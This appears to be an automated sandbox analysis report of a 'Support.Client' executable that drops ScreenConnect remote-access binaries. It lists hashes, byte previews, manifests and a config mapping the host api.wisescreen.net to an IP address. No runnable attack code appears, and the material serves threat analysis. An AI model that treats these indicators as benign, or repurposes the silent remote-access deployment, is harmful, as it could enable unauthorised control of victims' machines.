SSDEEP:	1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
MD5:	75B21D04C69128A7230A0998086B61AA
SHA1:	244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
SHA-256:	F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
SHA-512:	8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.034211651049746
Encrypted:	false
SSDEEP:	12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
MD5:	14E7489FFEBBB5A2EA500F796D881AD9
SHA1:	0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:	A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:	2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1215
Entropy (8bit):	5.1306699113418395
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
MD5:	293C100B1896E7532D241DAC2B32DCB3
SHA1:	1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
SHA-256:	AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
SHA-512:	ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639085961200334
Encrypted:	false
SSDEEP:	24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
MD5:	9AD3964BA3AD24C42C567E47F88C82B2
SHA1:	6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
SHA-256:	84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
SHA-512:	CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..\|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...\|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1980
Entropy (8bit):	5.057602063510745
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
MD5:	88ECD545BDBE3ED49C6A2B87589102EC
SHA1:	E72949AF66B0A20E50474D2005E320BA63BA9B2B
SHA-256:	D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
SHA-512:	7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61208
Entropy (8bit):	6.310126082367387
Encrypted:	false
SSDEEP:	1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
MD5:	AFA97CAF20F3608799E670E9D6253247
SHA1:	7E410FDE0CA1350AA68EF478E48274888688F8EE
SHA-256:	E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
SHA-512:	FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	602392
Entropy (8bit):	6.176232491934078
Encrypted:	false
SSDEEP:	6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
MD5:	1778204A8C3BC2B8E5E4194EDBAF7135
SHA1:	0203B65E92D2D1200DD695FE4C334955BEFBDDD3
SHA-256:	600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
SHA-512:	A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2569
Entropy (8bit):	5.027116382154264
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
MD5:	6A1C3FF3E8F5E23698453B4CCDA2FD12
SHA1:	C7EED4383B7F1982222E663A0B8850D09B6B20EF
SHA-256:	8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
SHA-512:	C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
Category:	dropped
Size (bytes):	17858
Entropy (8bit):	5.96124399589564
Encrypted:	false
SSDEEP:	384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
MD5:	7F68A01C2FEA1C80A75E287BB36D6B43
SHA1:	F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
SHA-256:	2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
SHA-512:	C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81688
Entropy (8bit):	5.8618809599146005
Encrypted:	false
SSDEEP:	1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
MD5:	1AEE526DC110E24D1399AFFCCD452AB3
SHA1:	04DB0E8772933BC57364615D0D104DC2550BD064
SHA-256:	EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
SHA-512:	482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\System32\user.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.026150003724022
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCDtm/vXbAa3xT:2dL9hK6E46YP8gGSaSvH
MD5:	3A6D1C8F07AAEFF11EFC5F018A150DFF
SHA1:	89E385089E5F4F8B3D16900D94371AC19E0CFC75
SHA-256:	16AB797C35A25D8F08A0B6AEC7E57867BED0D644287ECDDD73889A05D1E16C4E
SHA-512:	3BA5327CAC75868E458D2C8D001A063E1BC54A1B7992C7AB2641348B6D0FB7EA3BD2870F39674DD992431F7634220D39B09CC0DDE04CA23CAF360A6B5D655556
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a27%3a02</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465487182888425
Encrypted:	false
SSDEEP:	6144:PIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbm:gXD94+WlLZMM6YFHX+m
MD5:	129BDA44B4ACD1DBDD0D145E24EC3A80
SHA1:	6A582F82F1BEA00249E9602BA4A7F29B3C45885E
SHA-256:	E908D5051761CC08BE052548A735F5A45B21FD5B7FFF92C0B2A9C1C1B32E75E4
SHA-512:	7466172F87A99028FAFB4BA55966F58A3192814D23EB035088EF8E5DD58394950BA4385880F332D06949963FF905B0E7A050FB6D483F2F5C8429E096CB1F183A
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.!.G.5................................................................................................................................................................................................................................................................................................................................................s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.513141041752648
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Support.Client (1).exe
File size:	83'328 bytes
MD5:	ee2fd372b98d7899c7e12d85f4c7f695
SHA1:	22f704d299c0160038965ad41d6a486e5c125f55
SHA256:	021ecc419445fe19ca6a15e7367c88f8a4121023746acd94263fb3e156861e03
SHA512:	fb990e00d1ca0cb624c1cacb633218a21b8621096404b6a1f1259700ab7cc236a369a63289aa09410d083821bde81dffe49f9b297043d9667a4d51d5102694d0
SSDEEP:	1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYY37tJ:7enkyfPAwiMq0RqRfbaWZJYY3P
TLSH:	A3836C43B5D18475E9720E3118B1D9B4593FBE210E648EAF7398422E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


